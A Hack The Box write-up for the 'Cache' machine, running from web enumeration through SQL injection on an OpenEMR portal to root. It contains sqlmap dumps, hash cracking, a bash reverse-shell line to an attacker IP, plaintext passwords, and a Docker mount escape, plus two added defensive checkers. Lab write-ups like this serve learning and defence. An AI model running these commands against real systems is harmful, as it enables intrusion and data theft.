Cache - [HTB]

Marmeus

    Introduction

    Cache is a medium-level Hack The Box machine in which you have to "hack" into a hacker's website, which later turns out to host a medical login portal, in order to get a user. Then you have to enumerate several local services to find special credentials that allow you to become root through Docker containers.

    Enumeration

    As always, I start by scanning all ports so that I know every single service running.

    kali@kali:$ sudo nmap -sS -T5 -n -p- -oN AllPorts.txt 10.10.10.188
    Warning: 10.10.10.188 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.10.188
    Host is up (0.039s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    
    # Nmap done at Fri Oct  2 11:05:44 2020 -- 1 IP address (1 host up) scanned in 64.95 seconds

    Then I run a more in-depth scan against the services found in the previous scan.

    kali@kali:$ sudo nmap -sC -sV -n -p22,80 -oN PorsDepth.txt 10.10.10.188
    Nmap scan report for 10.10.10.188
    Host is up (0.038s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
    |   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
    |_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Cache
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Fri Oct  2 11:06:27 2020 -- 1 IP address (1 host up) scanned in 10.65 seconds
    
    

    Because there are only two services and one of them is SSH, which almost never has exploitable vulnerabilities, I have no option but to start analyzing the HTTP service.

    Web

    At first sight I don't see anything interesting, so I use gobuster to find hidden folders.

    kali@Kali:$ gobuster -t 20 dir -u http://10.10.10.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directories.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.188/
    [+] Threads:        20
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/10/06 16:44:22 Starting gobuster
    ===============================================================
    /javascript (Status: 301)
    /jquery (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/10/06 16:53:26 Finished
    ===============================================================
    

    Inside the /jquery folder there is a functionality.js file.

    Looking at the code, there are some hard-coded credentials that can be used in the "login" section of the main web page.

    As you can see, this page is under construction and there isn't anything useful.

    However, on the author page the "hacker" talks about two projects: one named Cache, with its corresponding domain "cache.htb", and another named "HMS" (Hospital Management System).

    Using "hms.htb" as the host name, an OpenEMR login portal appears. (OpenEMR is open-source electronic medical record and practice management software.)

    Exploitation

    This document shows that OpenEMR is vulnerable to several SQL injection attacks. Starting with the find_appt_popup_user.php file, I got this page.

    Note: In order to perform the SQL injection attack you need to create an account at http://hms.htb/portal/index.php?site=default&w

    I stored the HTTP request in a text file using Burp.

    This request can be fed to sqlmap to perform the SQL injection and list the databases.

    kali@kali:$ sqlmap -r request.txt --dbs --batch
    available databases [2]:
    [*] information_schema
    [*] openemr

    Note: --batch tells sqlmap never to ask for user input and to use its default behaviour instead.

    Then, using sqlmap, we can list the tables inside the openemr database.

    kali@kali:$ sqlmap -r request.txt --threads=10 -D openemr --tables --batch 

    Finally, the user information is in the users_secure table, so using sqlmap we can dump it.

    kali@kali:$ sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump
    | SALT                           | PASSWORD                                                     | USER          |
    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | openemr_admin |

    The password can be cracked using John the Ripper (the hash.txt file contains the line "openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.").

    kali@kali:$ john -w=/usr/share/wordlists/rockyou.txt hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
    Cost 1 (iteration count) is 32 for all loaded hashes
    Will run 3 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    xxxxxx           (openemr_admin)
    1g 0:00:00:00 DONE (2020-10-07 18:55) 2.777g/s 2400p/s 2400c/s 2400C/s lester..felipe
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    

    These credentials can be used with the exploit "5.0.1 - (Authenticated) Remote Code Execution" to get a reverse shell.

    {Shell 1}:$ rlwrap nc -nlvp 4444
    {Shell 2}:$ python OpenEMRCE.py -u openemr_admin -p xxxxxx -c  '/bin/bash -i >& /dev/tcp/10.10.14.215/4444 0>&1' http://hms.htb

    Later on, we can use Python to spawn a proper TTY and ash's credentials to get the user.txt flag.

    www-data@cache:/var/www/hms.htb/public_html/interface$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@cache:/var/www/hms.htb/public_html/interface$ su - ash 
    su - ash 
    Password: H@v3_fun
    ash@cache:~$ wc -c user.txt
    33 user.txt

    Privilege escalation 1

    Using netstat, we can find an unusual listening port, 11211.

    ash@cache:~$ netstat -putona
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0    307 10.10.10.188:45080      10.10.14.215:4444       ESTABLISHED 3709/bash            on (0.24/0/0)
    tcp        0      0 127.0.0.1:11211         127.0.0.1:40990         TIME_WAIT   -                    timewait (27.64/0/0)
    tcp        0      1 10.10.10.188:53236      8.8.8.8:53              SYN_SENT    -                    on (6.90/3/0)
    tcp        0      0 10.10.10.188:44950      10.10.14.215:4444       CLOSE_WAIT  3452/bash            off (0.00/0/0)
    tcp6       0      0 :::80                   :::*                    LISTEN      -                    off (0.00/0/0)
    tcp6       0      0 :::22                   :::*                    LISTEN      -                    off (0.00/0/0)
    tcp6       1      0 10.10.10.188:80         10.10.14.215:38106      CLOSE_WAIT  -                    keepalive (6623.12/0/0)
    tcp6       0      0 10.10.10.188:80         10.10.14.215:38122      ESTABLISHED -                    keepalive (7182.57/0/0)
    udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                    off (0.00/0/0)
    udp        0      0 127.0.0.1:40122         127.0.0.53:53           ESTABLISHED -                    off (0.00/0/0)

    A quick search on Saint Google turns up a pentesting article for the memcached service. (Memcached is used by companies to speed up their services by storing frequently used data in memory, which takes load off the hardware and reduces response times.)

    Following the article's steps, we get the user "luffy" with the password "0n3_p1ec3".

    telnet 127.0.0.1 11211
    stats items
    stats cachedump 1 0
    get user
    get passwd

    These credentials can be used on the Linux machine to become the user luffy.

    luffy@cache:~$ id
    uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
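    An added example, not from the write-up or the linked article: an audit helper that speaks the same memcached text protocol as the telnet session above (stats items, stats cachedump; it never fetches values) and lists key names that look like cached credentials, so an operator can check whether secrets are sitting in a local cache. The sample responses are constructed and the key-name patterns are my own choice.

```python
import re
import socket

# Constructed sample responses in the memcached text protocol (not captured
# from the machine), so the parsers can be exercised offline.
SAMPLE_STATS_ITEMS = (
    "STAT items:1:number 2\r\n"
    "STAT items:1:age 1234\r\n"
    "STAT items:5:number 1\r\n"
    "END\r\n"
)
SAMPLE_CACHEDUMP = (
    "ITEM user [5 b; 1600000000 s]\r\n"
    "ITEM passwd [9 b; 1600000000 s]\r\n"
    "ITEM link [21 b; 1600000000 s]\r\n"
    "END\r\n"
)
# Key-name patterns that suggest a secret is being cached (my own list).
SENSITIVE = re.compile(r"pass|pwd|secret|token|cred|user", re.I)

def parse_slab_ids(stats_items):
    """Slab class ids from a 'stats items' response ('STAT items:<id>:...')."""
    ids = re.findall(r"^STAT items:(\d+):number", stats_items, re.M)
    return sorted({int(i) for i in ids})

def parse_cachedump_keys(cachedump):
    """Key names from a 'stats cachedump <slab> 0' response ('ITEM <key> [...]')."""
    return re.findall(r"^ITEM (\S+) \[", cachedump, re.M)

def sensitive_keys(keys):
    return [k for k in keys if SENSITIVE.search(k)]

def _command(sock, line):
    """Send one text-protocol command and read until the END (or ERROR) line."""
    sock.sendall(line.encode() + b"\r\n")
    data = b""
    while not data.endswith((b"END\r\n", b"ERROR\r\n")):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data.decode(errors="replace")

def audit_memcached(host="127.0.0.1", port=11211, timeout=3.0):
    """List key names in a local memcached that look like cached credentials."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        keys = []
        for slab in parse_slab_ids(_command(sock, "stats items")):
            keys += parse_cachedump_keys(_command(sock, f"stats cachedump {slab} 0"))
    return sensitive_keys(keys)
```

    Run audit_memcached() on the host itself; a non-empty result means credentials are being cached in clear text, which no loopback-only binding protects against once a local account is compromised.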

    Privilege escalation 2

    This user belongs to the docker group and can therefore run Docker containers. A quick look at the GTFOBins web page gives a command to get an interactive shell as root on the host file system. However, the "alpine" image doesn't exist on this system, so we have to use ubuntu, which is the one already installed.

    luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
    # wc -c /root/root.txt
    33 /root/root.txt
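    As an added, defender-side example (not part of the original write-up): a small policy check of the kind a Docker authorization plugin or CI gate would apply, flagging docker run command lines like the one above that bind-mount the host root or request host namespaces. The dangerous path and flag lists are my own selection.

```python
import shlex

# Host paths whose bind mount into a container hands over control of the host.
# The lists below are my own selection; extend them to taste.
DANGEROUS_SOURCES = ("/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")
DANGEROUS_FLAGS = ("--privileged", "--pid=host", "--net=host", "--network=host",
                   "--userns=host", "--cap-add=SYS_ADMIN", "--cap-add=ALL")

def bind_mount_sources(argv):
    """Yield host-side paths from -v/--volume/--mount options of a docker run argv."""
    it = iter(argv)
    for tok in it:
        if tok in ("-v", "--volume"):
            yield next(it, "").split(":")[0]
        elif tok.startswith("--volume="):
            yield tok.split("=", 1)[1].split(":")[0]
        elif tok == "--mount" or tok.startswith("--mount="):
            spec = tok.split("=", 1)[1] if "=" in tok else next(it, "")
            for kv in spec.split(","):
                key, _, value = kv.partition("=")
                if key in ("source", "src"):
                    yield value

def host_escape_risks(cmdline):
    """Return the reasons a 'docker run' command line could take over the host."""
    argv = shlex.split(cmdline)
    if len(argv) < 2 or argv[0] != "docker" or "run" not in argv[1:3]:
        return []
    risks = []
    for src in bind_mount_sources(argv):
        src = src.rstrip("/") or "/"
        if any(src == d or src.startswith(d + "/") for d in DANGEROUS_SOURCES):
            risks.append(f"bind mount of host path {src}")
    risks += [flag for flag in DANGEROUS_FLAGS if flag in argv]
    return risks
```

    The same check explains why docker group membership is root-equivalent: nothing in the daemon stops a member from mounting / and chrooting into it, so the fix is to keep that group empty or move to rootless Docker.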